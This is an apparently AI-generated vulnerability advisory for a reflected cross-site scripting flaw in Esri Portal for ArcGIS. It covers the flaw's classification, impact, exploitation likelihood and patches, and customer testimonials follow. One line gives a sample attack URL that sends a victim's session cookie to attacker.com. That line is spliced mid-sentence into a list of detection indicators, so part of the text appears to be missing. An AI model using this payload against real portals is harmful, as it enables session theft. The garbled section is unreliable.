
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-69234 is a reflected cross-site scripting (XSS) vulnerability in Esri Portal for ArcGIS affecting versions 11.1 through 11.5. It allows a remote, unauthenticated attacker to craft a malicious link that, when clicked by a victim, executes arbitrary JavaScript code in the victim's browser. The vulnerability was published on August 21, 2026, by Esri (Environmental Systems Research Institute, Inc.). It carries a CVSS v3.1 base score of 6.1 (Medium) (GitHub Advisory, Esri Security Bulletin).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically of the reflected XSS variant (CAPEC-591). The root cause is insufficient sanitization of user-supplied input that is reflected back in HTTP responses without proper encoding, allowing injected JavaScript to execute in the victim's browser context. Exploitation requires no authentication and no special privileges, but does require user interaction — specifically, a victim must click a crafted link. No technical write-ups or public proof-of-concept code have been identified at this time (GitHub Advisory, Esri Security Bulletin).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser with the same privileges as the authenticated user, potentially enabling theft of session cookies, authentication tokens, or sensitive data displayed on the page. The scope change in the CVSS vector (S:C) indicates that the impact extends beyond the vulnerable component itself to the victim's browser environment. Availability is not directly impacted, but confidentiality and integrity are both assessed as low-impact per the CVSS scoring (GitHub Advisory).
There is no evidence of public proof-of-concept exploit code or active in-the-wild exploitation at this time. The EPSS score is approximately 0.235% (15th percentile), indicating a low near-term probability of exploitation. The vulnerability has not been added to the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported (GitHub Advisory).
https://target-portal/arcgis/home/search.html?q=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.%3Cscript%3E, javascript:, onerror=) in query string parameters; referrer headers pointing to external or unexpected sources.Esri has released patches for ArcGIS Enterprise versions 11.1, 11.3, and 11.5; users on these versions are encouraged to apply the available patches promptly. All users are advised to upgrade to the latest long-term support release of ArcGIS Enterprise. Users of ArcGIS Web App Builder developer edition should migrate to ArcGIS Experience Builder, as the developer edition is no longer supported. Details on the patches are available in the August 2026 ArcGIS Security Bulletin (Esri Security Bulletin).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."